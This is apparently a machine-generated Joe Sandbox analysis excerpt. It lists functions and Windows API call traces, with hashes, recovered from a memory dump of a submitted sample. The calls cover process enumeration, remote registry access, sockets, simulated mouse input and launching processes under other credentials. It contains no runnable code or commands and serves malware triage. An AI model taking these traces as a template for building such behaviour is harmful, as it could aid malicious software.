MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006709CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006709F1
SysAllocString.OLEAUT32(00000000), ref: 006709F4
SysAllocString.OLEAUT32 ref: 00670A15
SysFreeString.OLEAUT32 ref: 00670A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 00670A38
SysAllocString.OLEAUT32(?), ref: 00670A46

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: d55fcd0247b7285d800dbe2a8323705f05c0853892eee90ff80eafe817cac2a6
Instruction ID: 1e85d268c10973ace5bfa22596a5a736b9d3959a8dc9994725e88f62decf2e22
Opcode Fuzzy Hash: d55fcd0247b7285d800dbe2a8323705f05c0853892eee90ff80eafe817cac2a6
Instruction Fuzzy Hash: C1216275600204BFAB10DBACDC88DAB77EDEF08364B00C125F909CB2A1EA70EC818764

Function 0069A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0064D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0064D1BA
Part of subcall function 0064D17C: GetStockObject.GDI32(00000011), ref: 0064D1CE
Part of subcall function 0064D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0064D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0069A32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0069A33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0069A345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0069A354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0069A360

Strings

Msctls_Progress32, xrefs: 0069A2FE

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 99a7abdaa151a84c342ee36477b283f2000d98cd888d8af6d69c1133a364dc7c
Instruction ID: 128ca0e9c78dbc7a068617e4c341405b4c2010b08a82bff048a7b0c8b2dd37f7
Opcode Fuzzy Hash: 99a7abdaa151a84c342ee36477b283f2000d98cd888d8af6d69c1133a364dc7c
Instruction Fuzzy Hash: B411B6B1550219BEEF115FA1CC85EE77F6EFF09798F014114FA04A6160C7729C21DBA4

Function 0064CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0064CCF6
GetWindowRect.USER32(?,?), ref: 0064CD37
ScreenToClient.USER32(?,?), ref: 0064CD5F
GetClientRect.USER32(?,?), ref: 0064CE8C
GetWindowRect.USER32(?,?), ref: 0064CEA5

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 787b0a1947f07837768177340d77b22e19d87ee2527b70c71d0c7cd7282f49f2
Instruction ID: a11e041e7708fce30006072181c6011831927ebe5c3b39b44483481ef2b5d0dd
Opcode Fuzzy Hash: 787b0a1947f07837768177340d77b22e19d87ee2527b70c71d0c7cd7282f49f2
Instruction Fuzzy Hash: 2FB1387990064ADBDB50CFA8C5807EEBBB2FF08310F149529EC59AB350EB31AD51DB64

Function 00691BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00691C18
Process32FirstW.KERNEL32(00000000,?), ref: 00691C26
__wsplitpath.LIBCMT ref: 00691C54

Part of subcall function 00651DFC: __wsplitpath_helper.LIBCMT ref: 00651E3C

_wcscat.LIBCMT ref: 00691C69
Process32NextW.KERNEL32(00000000,?), ref: 00691CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00691CF1

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: 2f754dd2b5adb260b57a6db460a3822fb4ac51973a885676203b6e3501428269
Instruction ID: baa23248db5dbdaaf6ee3b9167e7612c946ffd99c5ce68b952dc0a362da9b991
Opcode Fuzzy Hash: 2f754dd2b5adb260b57a6db460a3822fb4ac51973a885676203b6e3501428269
Instruction Fuzzy Hash: 9A518EB15043019FD720EF24C881EABB7EDEF88754F10491EF5869B251EB30D904CB96

Function 00692FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00693C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00692BB5,?,?), ref: 00693C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006930AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006930EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00693112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0069313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0069317E
RegCloseKey.ADVAPI32(00000000), ref: 0069318B

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: 399474178538302dc8f3e4140016cee58ab25cd5b3190f48c58c20b39539c810
Instruction ID: 0085e3198b6aaa2052df2f149060cc6f0b7e898bedd331c028561bb7ffaf3ccd
Opcode Fuzzy Hash: 399474178538302dc8f3e4140016cee58ab25cd5b3190f48c58c20b39539c810
Instruction Fuzzy Hash: BF514771108310AFCB44EF64C885EAABBFAFF88314F04891DF555972A1DB71EA05CB96

Function 006984DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00698540
GetMenuItemCount.USER32(00000000), ref: 00698577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0069859F
GetMenuItemID.USER32(?,?), ref: 0069860E
GetSubMenu.USER32(?,?), ref: 0069861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 0069866D

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 217296928fa29532349a654bd3fbff865532344198f984787afaa42ee5601ba9
Instruction ID: d28b16c9b32147db67b87d0f0b5a4addab5f7d4f0e7147a5f09a0b8185f61621
Opcode Fuzzy Hash: 217296928fa29532349a654bd3fbff865532344198f984787afaa42ee5601ba9
Instruction Fuzzy Hash: 2A518F71A00215AFCF51EF64C841AEEB7FAEF49310F114469E916BB351DB70AE418B94

Function 00674AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00674B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00674B5B
IsMenu.USER32(00000000), ref: 00674B7B
CreatePopupMenu.USER32 ref: 00674BAF
GetMenuItemCount.USER32(000000FF), ref: 00674C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00674C3E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: ad7807c78ff4ebc7a809ce97e2e9d26af2fe0051a24df0c0b1a6d737f6f9ab54
Instruction ID: f1178d72557c9e2e76be10ba6c4d57a2f969bceb7928ef9a9925b8e5714d83be
Opcode Fuzzy Hash: ad7807c78ff4ebc7a809ce97e2e9d26af2fe0051a24df0c0b1a6d737f6f9ab54
Instruction Fuzzy Hash: 0051B070601209DBDF25CF64C88CBEDBBF6AF45314F248159E4199B291EB709D85CB51

Function 00688DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,006CDC00), ref: 00688E7C
WSAGetLastError.WSOCK32(00000000), ref: 00688E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00688EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 00688EC5
_strlen.LIBCMT ref: 00688EF7
WSAGetLastError.WSOCK32(00000000), ref: 00688F6A

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: d34a18e3d72806d0811f9530b3444aad9854b8939181c52d3b0f3f638403dc62
Instruction ID: 644e2d03c03441085e75e523ee39b89d29c14f0681b8b07023ed74f66ffda76a
Opcode Fuzzy Hash: d34a18e3d72806d0811f9530b3444aad9854b8939181c52d3b0f3f638403dc62
Instruction Fuzzy Hash: AC418171500204AFCB54EBA4CD95EEEB7BBAF48350F10466DF51A97291EF30AE40CB64

Function 0064ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0064B34E: GetWindowLongW.USER32(?,000000EB), ref: 0064B35F

BeginPaint.USER32(?,?,?), ref: 0064AC2A
GetWindowRect.USER32(?,?), ref: 0064AC8E
ScreenToClient.USER32(?,?), ref: 0064ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0064ACBC
EndPaint.USER32(?,?,?,?,?), ref: 0064AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 006AE673

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: e02fbc3fadae878c62e3b012cea6199e45ef8946418a6d2b64aae197d23dd578
Instruction ID: fe9809d9a8845c06bdb023c9db119544f0a16c4c5df12aa07f9bf96bd9205715
Opcode Fuzzy Hash: e02fbc3fadae878c62e3b012cea6199e45ef8946418a6d2b64aae197d23dd578
Instruction Fuzzy Hash: 2341CF71104301AFC710DF64CC84FB67BAAEF5A360F14166DF9A48B2A1D731AD85DB62

Function 0069E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(006F1628,00000000,006F1628,00000000,00000000,006F1628,?,006ADC5D,00000000,?,00000000,00000000,00000000,?,006ADAD1,00000004), ref: 0069E40B
EnableWindow.USER32(00000000,00000000), ref: 0069E42F
ShowWindow.USER32(006F1628,00000000), ref: 0069E48F
ShowWindow.USER32(00000000,00000004), ref: 0069E4A1
EnableWindow.USER32(00000000,00000001), ref: 0069E4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0069E4E8

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 7464469245e49edfd663ace26bd0c533c92248a2e96d4f2a878f196e57a9c470
Instruction ID: 5513f71899b60c7a1b5a8c2da04a2ca0d029636c30d864422e6c486b45cfb5ed
Opcode Fuzzy Hash: 7464469245e49edfd663ace26bd0c533c92248a2e96d4f2a878f196e57a9c470
Instruction Fuzzy Hash: 96417174601141EFDF22CF28C599BD47BE6BF09B14F1881B9EA588F6A2C732E845CB51

Function 006798BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 006798D1

Part of subcall function 0064F4EA: std::exception::exception.LIBCMT ref: 0064F51E
Part of subcall function 0064F4EA: __CxxThrowException@8.LIBCMT ref: 0064F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00679908
EnterCriticalSection.KERNEL32(?), ref: 00679924
LeaveCriticalSection.KERNEL32(?), ref: 0067999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006799B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 006799D2

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: 2ce5a260ec354c9daef8f83e793c3be5b9eab99f8113269bacbde69e13a41b01
Instruction ID: 2b26756b5d9c3027a4debce4472ea486bb3f7ab87fedef58553568ecf589cb03
Opcode Fuzzy Hash: 2ce5a260ec354c9daef8f83e793c3be5b9eab99f8113269bacbde69e13a41b01
Instruction Fuzzy Hash: 58315271900105ABDB50DFA4DC85DAA77BAFF45310B1481B9F904AF246D770DA54CB64

Function 00689B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,006877F4,?,?,00000000,00000001), ref: 00689B53

Part of subcall function 00686544: GetWindowRect.USER32(?,?), ref: 00686557

GetDesktopWindow.USER32 ref: 00689B7D
GetWindowRect.USER32(00000000), ref: 00689B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00689BB6

Part of subcall function 00677A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00677AD0

GetCursorPos.USER32(?), ref: 00689BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00689C44

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 20057fe065be83c84c72d4f5f59bc8fee6bab23ea7c0fb7981813bf7ead96db4
Instruction ID: 81681d22f894948b64ab1545ce8182159298c105540fb0a0d3e6329f025c697a
Opcode Fuzzy Hash: 20057fe065be83c84c72d4f5f59bc8fee6bab23ea7c0fb7981813bf7ead96db4
Instruction Fuzzy Hash: 9131C3B2104315ABD720DF14D849F9BB7EAFF85314F040A29F589D7281E671E944CBA2

Function 0066AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0066AFAE
OpenProcessToken.ADVAPI32(00000000), ref: 0066AFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0066AFC4
CloseHandle.KERNEL32(00000004), ref: 0066AFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0066AFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 0066B012

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 041c36a09cdefe7af7d8daf8e100ad40af1794ef0d02928b000ff9a21553e315
Instruction ID: 0cb0dd2531ce81ae66cdef5387aa56d6c30c9546da2e3a820cc5c95c90afe5f0
Opcode Fuzzy Hash: 041c36a09cdefe7af7d8daf8e100ad40af1794ef0d02928b000ff9a21553e315
Instruction Fuzzy Hash: 98214CB2100209ABDB129F94ED09BEE7BAAAB45304F044125FA01A6161D376DD61EB62

Function 0069EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0064AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0064AFE3
Part of subcall function 0064AF83: SelectObject.GDI32(?,00000000), ref: 0064AFF2
Part of subcall function 0064AF83: BeginPath.GDI32(?), ref: 0064B009
Part of subcall function 0064AF83: SelectObject.GDI32(?,00000000), ref: 0064B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0069EC20
LineTo.GDI32(00000000,00000003,?), ref: 0069EC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0069EC42
LineTo.GDI32(00000000,00000000,?), ref: 0069EC52
EndPath.GDI32(00000000), ref: 0069EC62
StrokePath.GDI32(00000000), ref: 0069EC72

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: e38dba82a7596a0ac310c4cccd8ec5283a7c4fe1696b76d7af430a860e907c51
Instruction ID: e07d1b6218b0e64ff6d2ba5017ee50c4ce54cc78fe7b092d56037b01f918cb22
Opcode Fuzzy Hash: e38dba82a7596a0ac310c4cccd8ec5283a7c4fe1696b76d7af430a860e907c51
Instruction Fuzzy Hash: 701109B2000149BFEF029F94DC88EEA7F6EEB08354F048112BE1899160D7719E95DBA0

Function 0066E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0066E1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 0066E1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0066E1D8
ReleaseDC.USER32(00000000,00000000), ref: 0066E1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0066E1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 0066E209

Part of subcall function 00669AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00669A05,00000000,00000000,?,00669DDB), ref: 0066A53A

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 399b37d2a121c72ac01a09a23bc74afef66e2444bf480b1f6c6a289d56306446
Instruction ID: 041bf55ef6272fdf3babd6e4b4ada17ff4eeb96eebca1bedb2a4c2676f897f6d
Opcode Fuzzy Hash: 399b37d2a121c72ac01a09a23bc74afef66e2444bf480b1f6c6a289d56306446
Instruction Fuzzy Hash: CB0184B9E40214BFEB109FA58C45B5EBFBAEB48351F004166EE04AB390E6719C00CF60

Function 00657B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00657B47

Part of subcall function 0065123A: __initp_misc_winsig.LIBCMT ref: 0065125E
Part of subcall function 0065123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00657F51
Part of subcall function 0065123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00657F65
Part of subcall function 0065123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00657F78
Part of subcall function 0065123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00657F8B
Part of subcall function 0065123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00657F9E
Part of subcall function 0065123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00657FB1
Part of subcall function 0065123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00657FC4
Part of subcall function 0065123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00657FD7
Part of subcall function 0065123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00657FEA
Part of subcall function 0065123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00657FFD
Part of subcall function 0065123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00658010
Part of subcall function 0065123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00658023
Part of subcall function 0065123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00658036
